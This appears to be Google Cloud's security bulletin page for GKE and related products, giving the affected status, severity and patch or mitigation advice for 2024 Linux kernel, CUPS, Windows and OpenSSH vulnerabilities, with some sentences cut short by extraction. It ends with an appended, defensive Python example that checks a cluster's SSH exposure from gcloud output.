All security bulletins for the following products are described in this page:
- Google Kubernetes Engine (GKE)
- Google Distributed Cloud (software only) on VMware
- GKE on AWS
- GKE on Azure
- Google Distributed Cloud (software only) on bare metal
Vulnerabilities are often kept secret under embargo until affected parties have had a chance to address them. In these cases, the product's release notes will refer to "security updates" until the embargo has been lifted. At that point the notes will be updated to reflect the vulnerability the patch addressed.
When GKE issues a security bulletin that directly correlates to
your cluster configuration or version, we might send you a SecurityBulletinEvent
cluster notification that provides information about the vulnerability and actions
that you can take, if applicable. For information about setting up cluster
notifications, refer to Cluster notifications.
For more information on how Google manages security vulnerabilities and patches for GKE and GKE Enterprise, see Security patching.
GKE and GKE Enterprise platforms don't use components
such as ingress-nginx
and the CRI-O container runtime, and are unaffected
by any vulnerabilities in those components. If you install components from
other sources, refer to the security updates and patching advice of those
components at the source.
Use this XML feed to subscribe to security bulletins for this page.
GCP-2024-057
Published: 2024-10-03
Updated: 2024-11-19
Reference:
CVE-2024-45016
2024-11-19 Update: Added patch versions for Ubuntu node pools on GKE.
2024-10-15 Update: Added patch versions for GDC (VMware). Updated GDC (VMware) severity from Pending to Medium. Updated GKE severity from High to Medium.
GKE
Updated: 2024-11-19
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-11-19 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
Medium |
GDC (VMware)
Updated: 2024-10-15
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-10-15 Update: The following versions of GDC (VMware) are updated with code to fix this vulnerability. Upgrade your GDC (VMware) clusters to the following versions or later:
|
Medium |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-056
Published: 2024-09-27
Reference: CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177
GKE
Description | Severity |
---|---|
A vulnerability chain (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177) that could result in remote code execution was discovered in the CUPS printing system used by some Linux distributions. An attacker can exploit this vulnerability if the CUPS services are listening on UDP port 631 and they can connect to it. GKE does not use the CUPS printing system and is not affected.
What should I do?
No action required |
None |
GDC (VMware)
Description | Severity |
---|---|
A vulnerability chain (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177) that could result in remote code execution was discovered in the CUPS printing system used by some Linux distributions. An attacker can exploit this vulnerability if the CUPS services are listening on UDP port 631 and they can connect to it. GDC software for VMware does not use the CUPS printing system and is not affected.
What should I do?
No action required |
None |
GKE on AWS
Description | Severity |
---|---|
A vulnerability chain (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177) that could result in remote code execution was discovered in the CUPS printing system used by some Linux distributions. An attacker can exploit this vulnerability if the CUPS services are listening on UDP port 631 and they can connect to it. GKE on AWS does not use the CUPS printing system and is not affected.
What should I do?
No action required |
None |
GKE on Azure
Description | Severity |
---|---|
A vulnerability chain (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177) that could result in remote code execution was discovered in the CUPS printing system used by some Linux distributions. An attacker can exploit this vulnerability if the CUPS services are listening on UDP port 631 and they can connect to it. GKE on Azure does not use the CUPS printing system and is not affected.
What should I do?
No action required |
None |
GDC (bare metal)
Description | Severity |
---|---|
A vulnerability chain (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177) that could result in remote code execution was discovered in the CUPS printing system used by some Linux distributions. An attacker can exploit this vulnerability if the CUPS services are listening on UDP port 631 and they can connect to it. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution.
What should I do?
No action required |
None |
GCP-2024-054
Published: 2024-09-23
Reference: CVE-2024-5321
GKE
Description | Severity |
---|---|
A security issue was discovered in Kubernetes clusters with Windows nodes where
Any Kubernetes environment with Windows nodes is affected. Run
Affected GKE versions
What should I do?
The following versions of GKE have been updated to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel.
What vulnerabilities are being addressed?
CVE-2024-5321 |
Medium |
GDC (VMware)
Description | Severity |
---|---|
A security issue was discovered in Kubernetes clusters with Windows
nodes where Any Kubernetes environment with Windows nodes is affected. Run
What should I do?
Patch versions for GDC software for VMware are in progress. We'll update this bulletin with that information when it's available.
What vulnerabilities are being addressed?
CVE-2024-5321 |
Medium |
GKE on AWS
Description | Severity |
---|---|
A security issue was discovered in Kubernetes clusters with Windows nodes
where GKE on AWS clusters do not support Windows nodes and are not affected.
What should I do?
No action required |
None |
GKE on Azure
Description | Severity |
---|---|
A security issue was discovered in Kubernetes clusters with Windows nodes
where GKE on Azure clusters do not support Windows nodes and are not affected.
What should I do?
No action required |
None |
GDC (bare metal)
Description | Severity |
---|---|
A security issue was discovered in Kubernetes clusters with Windows nodes
where GDC software for bare metal clusters do not support Windows nodes and are not affected.
What should I do?
No action required |
None |
GCP-2024-050
Published: 2024-09-04
Reference: CVE-2024-38063
GKE
Description | Severity |
---|---|
A new remote code execution vulnerability (CVE-2024-38063) has been discovered in Windows. An attacker could remotely exploit this vulnerability by sending specially crafted IPv6 packets to a host.
What should I do?
GKE does not support IPv6 on Windows and is not affected by this CVE. No action is required. |
None |
GDC (VMware)
Description | Severity |
---|---|
A new remote code execution vulnerability (CVE-2024-38063) has been discovered in Windows. An attacker could remotely exploit this vulnerability by sending specially crafted IPv6 packets to a host.
What should I do?
GDC software for VMware does not support IPv6 on Windows and is not affected by this CVE. No action is required. |
None |
GKE on AWS
Description | Severity |
---|---|
A new remote code execution vulnerability (CVE-2024-38063) has been discovered in Windows. An attacker could remotely exploit this vulnerability by sending specially crafted IPv6 packets to a host.
What should I do?
GKE on AWS is not affected by this CVE. No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A new remote code execution vulnerability (CVE-2024-38063) has been discovered in Windows. An attacker could remotely exploit this vulnerability by sending specially crafted IPv6 packets to a host.
What should I do?
GKE on Azure is not affected by this CVE. No action is required. |
None |
GDC (bare metal)
Description | Severity |
---|---|
A new remote code execution vulnerability (CVE-2024-38063) has been discovered in Windows. An attacker could remotely exploit this vulnerability by sending specially crafted IPv6 packets to a host.
What should I do?
GDC (bare metal) isn't affected by this CVE. No action is required. |
None |
GCP-2024-049
Published: 2024-08-21
Updated: 2024-11-01
Reference:
CVE-2024-36978
2024-11-01 Update: Added patch versions for Ubuntu node pools on GKE.
2024-10-21 Update: Added patch versions and updated Severity for GDC (VMware).
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-11-01 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-10-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-10-21 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-048
Published: 2024-08-20
Updated: 2024-10-30
Reference:
CVE-2024-41009
2024-10-30 Update: Added patch versions for Ubuntu node pools on GKE.
2024-10-25 Update: Added patch versions and updated Severity for GDC (VMware).
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-10-30 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-10-25
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-10-25 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-047
Published: 2024-08-19
Updated: 2024-10-30
Reference:
CVE-2024-39503
2024-10-30 Update: Added patch versions for Ubuntu node pools on GKE.
2024-10-21 Update: Added patch versions and updated Severity for GDC (VMware).
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-10-30 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-10-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-10-21 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-045
Published: 2024-07-17
Updated: 2024-09-19
Reference:
CVE-2024-26925
2024-09-19 Update: Added patch versions for GDC (VMware).
2024-08-21 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-08-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-08-21 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-09-19
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-09-19 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-044
Published: 2024-07-16
Updated: 2024-10-30
Reference:
CVE-2024-36972
2024-10-30 Update: Added patch versions for Ubuntu node pools on GKE.
2024-10-21 Update: Added patch versions and updated Severity for GDC (VMware).
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-10-30 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-10-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-10-21 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-043
Published: 2024-07-16
Updated: 2024-10-02
Reference:
CVE-2024-26921
2024-10-02 Update: Added patch versions for Ubuntu node pools on GKE.
2024-09-20 Update: Added patch versions for GDC (VMware).
GKE
Updated: 2024-10-02
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-10-02 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-09-20
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-09-20 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-042
Published: 2024-07-15
Updated: 2024-07-18
Reference:
CVE-2024-26809
2024-07-18 Update: Clarified that Autopilot clusters in the default configuration aren't impacted.
GKE
Updated: 2024-07-18
Description | Severity |
---|---|
2024-07-18 Update: The original version of this bulletin incorrectly stated that Autopilot clusters were impacted. Autopilot clusters in the default configuration aren't impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow the
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-041
Published: 2024-07-08
Updated: 2024-09-16
Reference:
CVE-2023-52654, CVE-2023-52656
2024-09-16 Update: Added patch versions for GDC (VMware).
2024-07-19 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-07-19
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-07-19 Update: The following versions of GKE contain code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-09-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-09-16 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-040
Published: 2024-07-01
Updated: 2024-07-11
Reference:
CVE-2024-6387
2024-07-11 Update: Added patch versions for GDC software for VMware, GKE on AWS, and GKE on Azure.
2024-07-03 Update: Added patch versions for GKE
2024-07-02 Updates:
- Clarified that Autopilot clusters are impacted and will require user action.
- Added impact assessments and mitigation steps for GDC (VMware), GKE on AWS, and GKE on Azure.
- Corrected the GDC (bare metal) security bulletin to clarify that GDC (bare metal) isn't directly affected and that customers should check with OS vendors for patches.
GKE
Updated: 2024-07-03
Description | Severity |
---|---|
2024-07-03 Update: An expedited rollout is in progress and is expected to make new patch versions available across all zones by July 3, 2024 at 5 PM US and Canadian Pacific Daylight Time (UTC-7). To get a notification as soon as a patch is available for your specific cluster, use cluster notifications.
2024-07-02 Update: This vulnerability affects both Autopilot mode and Standard mode clusters. Each section that follows will tell you the modes to which that section applies.
A remote code execution vulnerability, CVE-2024-6387, was recently discovered in OpenSSH. The vulnerability exploits a race condition that could be used to obtain access to a remote shell, enabling attackers to gain root access to GKE nodes. At the time of publication, exploitation is believed to be difficult and take several hours per machine being attacked. We are not aware of any exploitation attempts.
All supported versions of Container-Optimized OS and Ubuntu images on GKE run versions of OpenSSH that are vulnerable to this issue. GKE clusters with public node IP addresses and SSH exposed to the Internet should be treated with the highest priority for mitigation. The GKE control plane is not vulnerable to this issue.
What should I do?
2024-07-03 Update: Patch versions for GKE
An expedited rollout is in progress and is expected to make new patch versions available across all zones by July 3, 2024 at 5 PM US and Canadian Pacific Daylight Time (UTC-7). Clusters and nodes with auto-upgrade enabled will begin upgrading as the week progresses, but due to the severity of the vulnerability we recommend upgrading manually as follows to get patches as fast as possible. For both Autopilot and Standard clusters, upgrade your control plane to a patched version. Additionally, for Standard mode clusters, upgrade your node pools to a patched version. Autopilot clusters will begin upgrading your nodes to match the control plane version as soon as possible.
Patched GKE versions are available for every supported version to minimize the changes necessary to apply the patch. The version number of each new version is an increment on the final digit in the version number of a corresponding existing version. For example, if you are on 1.27.14-gke.1100000, you will upgrade to 1.27.14-gke.1100002 to get the fix with the smallest possible change. The following patched GKE versions are available:
To check whether a patch is available in your cluster zone or region, run the following command: gcloud container get-server-config --location=
Replace 2024-07-02 Update: Both Autopilot mode and Standard mode clusters should be upgraded as soon as possible after patch versions are available. A patched GKE version that includes an updated OpenSSH will be made available as soon as possible. This bulletin will be updated when patches are available. To receive a Pub/Sub notification when a patch is available for your channel, enable cluster notifications. We recommend working through the following steps to check your cluster's exposure, and applying the mitigations described, as necessary. Determine whether your nodes have public IP addresses2024-07-02 Update: This section applies to both Autopilot and Standard clusters. If a cluster is created with
gcloud container clusters describe $CLUSTER_NAME \ --format="value(privateClusterConfig.enablePrivateNodes)" If the return value is True, all nodes are private nodes for this cluster and the vulnerability is mitigated. If the value is empty or false, continue on to apply one of the mitigations in the following sections. To find all clusters originally created with public nodes, use this Cloud Asset Inventory query in the project or organization: SELECT resource.data.name AS cluster_name, resource.parent AS project_name, resource.data.privateClusterConfig.enablePrivateNodes FROM `container_googleapis_com_Cluster` WHERE resource.data.privateClusterConfig.enablePrivateNodes is null OR resource.data.privateClusterConfig.enablePrivateNodes = false Disallow SSH to the cluster nodes2024-07-02 Update: This section applies to both Autopilot and Standard clusters. The default network is pre-populated with a
If you have created any other firewall rules that may allow SSH through TCP on port 22, disable them, or limit the source IPs to trusted networks. Verify that you can no longer SSH to the cluster nodes from the Internet. This firewall configuration mitigates the vulnerability. Convert public node pools to private2024-07-02 Update: For Autopilot clusters originally created as public clusters, you can place your workloads on private nodes by using nodeSelectors. However, Autopilot nodes that run system workloads on clusters that were originally created as public clusters will still be public nodes and should be protected by using the firewall changes described in the preceding section. To best protect clusters originally created with public nodes, we recommend first disallowing SSH through the firewall as already described. If you are not able to disallow SSH through the firewall rules, you can convert public node pools on GKE Standard clusters to private by following this guidance to isolate node pools. Change SSHD configuration2024-07-02 Update: This section only applies to Standard clusters. Autopilot workloads aren't allowed to modify node configuration. If none of these mitigations can be applied, we have also published a daemonset
that sets SSHD |
Critical |
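The exposure check that the preceding GKE section walks through, as an added example that is not part of this bulletin or of any Google tooling: it applies the bulletin's order of decisions (private nodes mitigate the issue; otherwise look for enabled ingress firewall rules on the cluster's network that admit TCP/22 from untrusted sources) to the JSON that `gcloud container clusters describe CLUSTER --format=json` and `gcloud compute firewall-rules list --format=json` print. The two cluster documents, the four firewall rules, the rule names and the 10.0.0.0/8 trusted range are all constructed for illustration; rules keyed on source tags or service accounts rather than source ranges are not evaluated.

```python
"""Triage a GKE cluster's SSH exposure the way the bulletin describes.

Added example, not Google's code. Input is the JSON printed by
`gcloud container clusters describe CLUSTER --format=json` and
`gcloud compute firewall-rules list --format=json`; all samples
below are constructed.
"""
import ipaddress
import json

# Constructed: cluster created with public nodes (enablePrivateNodes absent).
SAMPLE_CLUSTER_PUBLIC = json.dumps({
    "name": "prod-cluster", "network": "default", "privateClusterConfig": {}})

# Constructed: cluster created with private nodes.
SAMPLE_CLUSTER_PRIVATE = json.dumps({
    "name": "internal-cluster", "network": "default",
    "privateClusterConfig": {"enablePrivateNodes": True}})

NET = "https://www.googleapis.com/compute/v1/projects/example-project/global/networks/"

# Constructed firewall rule list. The first entry has the shape of the
# default-allow-ssh rule that the default network is pre-populated with.
SAMPLE_FIREWALL_RULES = json.dumps([
    {"name": "default-allow-ssh", "network": NET + "default", "direction": "INGRESS",
     "disabled": False, "sourceRanges": ["0.0.0.0/0"],
     "allowed": [{"IPProtocol": "tcp", "ports": ["22"]}]},
    {"name": "corp-ssh", "network": NET + "default", "direction": "INGRESS",
     "disabled": False, "sourceRanges": ["10.0.0.0/8"],          # 22 inside range, trusted source
     "allowed": [{"IPProtocol": "tcp", "ports": ["20-23"]}]},
    {"name": "old-allow-ssh", "network": NET + "default", "direction": "INGRESS",
     "disabled": True, "sourceRanges": ["0.0.0.0/0"],            # disabled: not in force
     "allowed": [{"IPProtocol": "tcp", "ports": ["22"]}]},
    {"name": "other-net-ssh", "network": NET + "lab", "direction": "INGRESS",
     "disabled": False, "sourceRanges": ["0.0.0.0/0"],           # different VPC network
     "allowed": [{"IPProtocol": "tcp", "ports": ["22"]}]},
])

# Assumption for the example: only these ranges count as trusted sources.
TRUSTED_SOURCES = (ipaddress.ip_network("10.0.0.0/8"),)


def nodes_are_private(cluster_json):
    """Same check as --format="value(privateClusterConfig.enablePrivateNodes)"."""
    cfg = json.loads(cluster_json).get("privateClusterConfig") or {}
    return bool(cfg.get("enablePrivateNodes", False))


def _covers_port_22(spec):
    ports = spec.get("ports")
    if ports is None:            # gcloud omits "ports" when every port is allowed
        return True
    for entry in ports:
        lo, _, hi = entry.partition("-")
        if int(lo) <= 22 <= int(hi or lo):
            return True
    return False


def _admits_ssh(rule):
    if rule.get("disabled") or rule.get("direction", "INGRESS") != "INGRESS":
        return False
    return any(spec.get("IPProtocol") in ("tcp", "all") and _covers_port_22(spec)
               for spec in rule.get("allowed", []))


def _untrusted(cidr, trusted):
    net = ipaddress.ip_network(cidr, strict=False)
    return not any(net.version == t.version and net.subnet_of(t) for t in trusted)


def internet_ssh_rules(cluster_json, firewall_json, trusted=TRUSTED_SOURCES):
    """Enabled ingress rules on the cluster's network that admit TCP/22 from a
    source outside the trusted ranges: the rules to disable or scope down.
    Rules without sourceRanges (tag- or service-account-keyed) are skipped."""
    network = json.loads(cluster_json).get("network", "default")
    return [r["name"] for r in json.loads(firewall_json)
            if r.get("network", "").rsplit("/", 1)[-1] == network
            and _admits_ssh(r)
            and any(_untrusted(c, trusted) for c in r.get("sourceRanges", []))]


def triage(cluster_json, firewall_json, trusted=TRUSTED_SOURCES):
    """Apply the bulletin's order of checks and return a one-line verdict."""
    if nodes_are_private(cluster_json):
        return "mitigated: all nodes are private"
    rules = internet_ssh_rules(cluster_json, firewall_json, trusted)
    if rules:
        return "exposed: disable or scope down " + ", ".join(rules)
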